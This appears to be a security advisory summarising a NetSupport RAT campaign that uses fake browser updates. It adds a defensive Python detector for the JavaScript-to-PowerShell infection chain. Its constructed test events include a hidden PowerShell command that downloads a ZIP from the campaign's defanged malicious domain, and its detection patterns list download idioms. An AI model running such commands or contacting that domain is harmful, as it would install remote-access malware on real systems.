Experts Warn of a Surge in NetSupport RAT Attacks Against Education and Government Sectors

Cyber Security Threat Summary:
In a report released this week, Carbon Black shared details of a recent rise in infections related to the NetSupport RAT over the past few weeks. Specifically, the RAT was being deployed against targets in the education, government, and business services sectors.

“NetSupport RAT is a remote control and desktop management software developed by NetSupport Ltd. It is designed to facilitate IT administrators and support staff in managing and controlling multiple remote computers from a centralized location. NetSupport Manager allows users to perform various tasks remotely, including troubleshooting, software distribution, system monitoring, and file transfers” (Security Affairs, 2023).

Security Officer Comments:
Various threat actors, including TA569, have been using NetSupport RAT in campaigns over the past few years. The software is typically delivered through fraudulent updates, drive-by downloads, phishing, and through malware loaders like GhostPulse.

In this recent campaign, threat actors were using older versions of NetSupport RAT, which use .BAT and .VBS files as decoys; fake browser updates were the distribution medium. According to Carbon Black, “Victims were tricked into downloading a fake browser update after visiting a compromised website. These infected websites host a PHP script which displays a seemingly authentic update. When the victim clicks on the download link, an additional JavaScript payload is downloaded onto the endpoint.”

Once downloaded and run, the JavaScript file (“Update_browser_10.6336[.]js”) retrieves and executes a PowerShell script from an external domain (implacavelvideos[.]com). The PowerShell script in turn retrieves a ZIP archive containing the NetSupport RAT.
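As an added illustration (not code from the Carbon Black report), the Python below walks constructed process-creation events and flags the parent-child relationship in the chain described above: a Windows script host running an Update_browser*.js lure that spawns a PowerShell process fetching a ZIP archive. The Sysmon-style field names, PIDs, user and paths are assumptions; only the lure file name pattern and the domain come from the summary.

```python
import re

SCRIPT_HOSTS = {"wscript.exe", "cscript.exe"}
# Lure file name pattern taken from the summary (Update_browser_10.6336.js).
FAKE_UPDATE_JS = re.compile(r"update_browser[^\"'\s]*\.js", re.I)
# Common PowerShell download idioms; the chain fetches a ZIP holding the RAT.
PS_DOWNLOAD = re.compile(r"iwr|invoke-webrequest|downloadfile|downloadstring|start-bitstransfer|curl|wget", re.I)
ZIP_FETCH = re.compile(r"\.zip\b", re.I)

# Constructed Sysmon-style process-creation events (assumed field names); the
# PIDs, user and paths are made up, not indicators from the report.
EVENTS = [
    # Stage 1: the user runs the fake "browser update" JavaScript lure.
    {"pid": 4312, "ppid": 900, "image": r"C:\Windows\System32\wscript.exe",
     "cmd": r'wscript.exe "C:\Users\alice\Downloads\Update_browser_10.6336.js"'},
    # Stage 2: the JS spawns PowerShell to pull the ZIP from the external domain.
    {"pid": 4400, "ppid": 4312,
     "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "cmd": r"powershell.exe -w hidden -c iwr hxxp://implacavelvideos[.]com/p.zip -OutFile $env:TEMP\p.zip"},
    # Benign: an admin downloads a ZIP from a console; no script-host parent.
    {"pid": 5100, "ppid": 900,
     "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "cmd": r"powershell.exe iwr https://intranet.example/tools.zip -OutFile tools.zip"},
    # Benign: a logon script run by the script host; no download child.
    {"pid": 5200, "ppid": 900, "image": r"C:\Windows\System32\cscript.exe",
     "cmd": r"cscript.exe \\dc01\netlogon\map_drives.vbs"},
]

def image_name(path):
    """Return the lower-cased executable name from a Windows image path."""
    return path.rsplit("\\", 1)[-1].lower()

def find_fake_update_chains(events):
    """Return (parent_pid, child_pid) pairs where a script host running an
    Update_browser*.js lure spawned a PowerShell process downloading a ZIP."""
    by_pid = {e["pid"]: e for e in events}
    hits = []
    for ev in events:
        if image_name(ev["image"]) != "powershell.exe":
            continue
        if not (PS_DOWNLOAD.search(ev["cmd"]) and ZIP_FETCH.search(ev["cmd"])):
            continue
        parent = by_pid.get(ev["ppid"])
        if (parent and image_name(parent["image"]) in SCRIPT_HOSTS
                and FAKE_UPDATE_JS.search(parent["cmd"])):
            hits.append((parent["pid"], ev["pid"]))
    return hits

if __name__ == "__main__":
    print(find_fake_update_chains(EVENTS))  # -> [(4312, 4400)]
```

Only the script-host-to-PowerShell pair is flagged; the lone admin download and the logon script are ignored because the parent-child link to the lure is missing.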

Suggested Correction(s):
Carbon Black shared various indicators of compromise (IoCs) in its report. Users should follow phishing best practices and monitor web URLs to ensure that browser update prompts come from legitimate sources. Threat actors are very good at masquerading as legitimate browser updates, so additional scrutiny should be applied.